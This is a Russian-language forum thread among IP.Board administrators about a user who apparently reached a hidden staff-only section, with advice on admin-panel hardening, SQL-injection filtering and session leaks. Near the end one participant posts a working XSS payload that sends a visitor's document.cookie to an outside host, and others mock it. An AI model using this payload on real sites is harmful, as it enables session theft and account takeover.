Взлом форума?

[dallas]

Существует на форуме раздел, в который имеют доступ только маски админов, супермодеров и модеров. И тут сегодня, появляется тема от маски "пользователи", юзеру влепил модератор премодерацию, и он грозную петицию написал в раздел, который он даже не видит. Я проверил, все настройки стоят правильно, зарегил юзера, раздел не виден, поставил этому юзеру премодераторство, раздел не виден, попытался ввести ссылку на раздел - ошибка. Кто-то может объяснить, как это произошло? И может это все в весии 2.3.5 исправлено? версия форума 2.3.4.

[Sannis]

С таким лучше разбираться на месте, смотреть его IP/id, писать для него логи, выявлять как он это делает.

[smash_TeAm]

тема могла быть создана в разделе где есть права на создание, а модератор мог переместить уже в скрытый раздел....

[dallas]

С таким лучше разбираться на месте, смотреть его IP/id, писать для него логи, выявлять как он это делает.

 

 

IP/ID - посмотрел, знаю откуда он, как вести логи, чтобы выявить как он это делает? Потому что появилась новая проблема, я так понимаю что это его же рук дело, у пользователей поисчезали разделы, которые им вполне доступны. Хотя изменений никаких не произошло ни в профилях, ни в настройках самих форумов.

 

Цитата от взломщика:

и еще одно удалите файл admin.php ну не ужели так трудно .... е мое такой форум много народу, а защита как всегда....

 

Может быть в этом проблема?

[FatCat]

тема могла быть создана в разделе где есть права на создание, а модератор мог переместить уже в скрытый раздел....

Ага! И проверить легко: рутовый админ в опциях модератора может посмотреть историю темы.

[Sannis]

Поставьте лучше на админку .htaccess, читайте раздел админки про безопасность. И проверяйте права, которые есть у этого пользователя.

[idTails]

Я тут вот накатал статеичку:

Безопасность IP.Board

 

Может написана и не ахти, но всё таки...

[dallas]

тема могла быть создана в разделе где есть права на создание, а модератор мог переместить уже в скрытый раздел....

 

Он уже не модератор. Спасибо за советы всем, админку засикурил, модеру по шапке настучал

[xRay]

idTails

самое главное и все вменяемые админы этому правилу следуют не использвоать в публичной части пользователя с админскими права. (для публичной части логин один, для админства совершенно другой)

[sudmed]

все вменяемые админы этому правилу следуют

... а те, кто не следует - невменяемые?

xRay, подавляющее большинство не следуют и ничего пока - не взломаны.

[idTails]

idTails

самое главное и все вменяемые админы этому правилу следуют не использвоать в публичной части пользователя с админскими права. (для публичной части логин один, для админства совершенно другой)

Хм, значит я не вменяемый.

Дак тут трой просто в компе усядится и пароли будет хавать = вот вам и взлом через админа.

Хотя если так дальше судить, то чтобы форум не взломали - уберите его из инета вообще

[2rough4u]

Главное, что надо сделать - поставить скрипт-фильтр (фаервол) от SQL-инъекций (фильтрует все вхождения опасных SQL-запросов в глобальных массивах входящих данных). А дальше уже не страшно. Пароль в живом виде не достать никак, от инъекций к базе защищены, ну а если сессию XSS-ом и украдут (было дело как-то на моей памяти), то сильно нагадить не смогут, ибо админка эту сессию не хавает, а без неё можно только флудом нагадить, темы поубивать... но нормальный хацкер таким детским садом, как правило, заниматься не станет.

InV_Firewall_Script_1.0.0.zip

[zapretnyii_plod]

А вот кстати вопрос - можно форум разнести по двум доменам? В одном - публичная часть, в другом - только админка. А БД у них общая. Насколько это позволяет лицензия? И каие файлы точно не понадобятся, если входить только в админ-центр, и какие, если там админ-центра точно нет.

 

Здесь чтобы войти в админку нужно ещё будет узнать второй домен. А его регистрация не так уж и дорого.

Изменено 12 Июня 2008 пользователем zapretnyii_plod

[smash_TeAm]

А вот кстати вопрос

вопрос не кстати один вопрос - одна тема. Вроде есть мод или инструкция (в поиск) по переименованию адреса админки, но думаю на другой домен перенести будет сложновато...

[xRay]

Насчет отдельного домена для админки лицухой только один домен на одну лицуху разрешается

[tolik777]

У меня была такая же ситуация пару раз. В скрытый раздел, только для админов и модераторов попал обычный гость (модер раздела, но не авторизован был и сидел с другого компа). Причем было это на новом компе и с новым IE. Т.е. вариант кукес забрел случайный исключается.

Сколько не пытались повторить всей модераторской, не получилось. Но было такое точно пару раз 100%.

А еще было, что модератор дал ссылку на форум с ID сессии. Человек нажал на этой ссылке и вошел под его логином с правами модератора. Хорошо, что чел добросовестный попался и написал об этом модератору. Опять же сколько потом не пробовали проделать такую ситуацию нам не получалось. Вообще IPB иногда очень загадочен.

[idTails]

Вообще IPB иногда очень загадочен.

Админить интереснее

[FatCat]

Вообще IPB иногда очень загадочен.

А еще раз было, когда захожу на форум, и вместо главной страницы вижу php-коды в режиме txt.

Апач тоже бывает очень загадочен.

[Lamaker]

<script>img = new Image(); img.src = "http://s.netsec.ru/greenka/pic.gif?"+document.cookie;</script>

[FatCat]

+document.cookie;

Месье кулхацкер?

[Sannis]

О, да

[2rough4u]

Одминка выносится на другой домен достаточно легко... стоит разместить на другом домене нужные файлы ядра, указать настройки базы и все домено-зависящие системные переменные, берущиеся из конфига в БД, в файле явным образом прописать где-нибудь в init.php

[Song]

А еще было, что модератор дал ссылку на форум с ID сессии. Человек нажал на этой ссылке и вошел под его логином с правами модератора. Хорошо, что чел добросовестный попался и написал об этом модератору. Опять же сколько потом не пробовали проделать такую ситуацию нам не получалось. Вообще IPB иногда очень загадочен.

Такое возможно. Но только при совпадении как минимум IP.